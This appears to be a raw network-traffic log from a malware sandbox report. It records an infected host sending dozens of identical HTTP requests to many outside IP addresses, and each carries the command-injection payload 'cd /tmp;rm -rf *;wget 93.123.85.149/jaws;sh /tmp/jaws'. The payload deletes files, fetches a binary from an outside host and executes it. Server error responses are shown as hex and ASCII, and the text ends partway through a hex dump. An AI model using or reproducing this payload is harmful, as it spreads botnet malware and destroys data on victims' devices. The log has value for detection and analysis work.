                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.808646917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.440462112 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.106095076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.912215948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.544081926 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.226229906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.047735929 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:27.679553032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.346194029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:29.151385069 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.783073902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.466214895 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.286930084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.918732882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:34.586190939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:35.390445948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.022241116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.706270933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:38.526174068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.157906055 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.826657057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.629595041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.261327982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.946405888 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.765120983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:46.396907091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.066591024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.868686914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:49.500514984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.186369896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:51.004358053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:52.636023045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:53.306474924 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:54.107825994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:55.739629984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:56.436861038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:57.243500948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.875161886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.556605101 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:00.379053116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.010792971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.676604986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            202192.168.2.235725251.103.222.22980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.418999910 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.628032923 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            203192.168.2.2344228104.107.149.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.457328081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.705696106 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 34 34 35 31 35 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 30 37 26 23 34 36 3b 36 32 63 64 61 37 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;64451502&#46;1706279507&#46;62cda7e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            204192.168.2.2359744202.40.219.19980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.532172918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.855567932 CET462INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Server: Apache/2.2.17 (EL)
                                                            Content-Length: 274
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 37 20 28 45 4c 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.17 (EL) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            205192.168.2.235534634.149.45.23680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.560631990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.663918018 CET441INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html; charset=UTF-8
                                                            Referrer-Policy: no-referrer
                                                            Content-Length: 273
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            206192.168.2.2353502192.126.135.9680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.579147100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.739489079 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: squid/3.5.20
                                                            Mime-Version: 1.0
                                                            Date: Fri, 26 Jan 2024 14:17:59 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3536
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 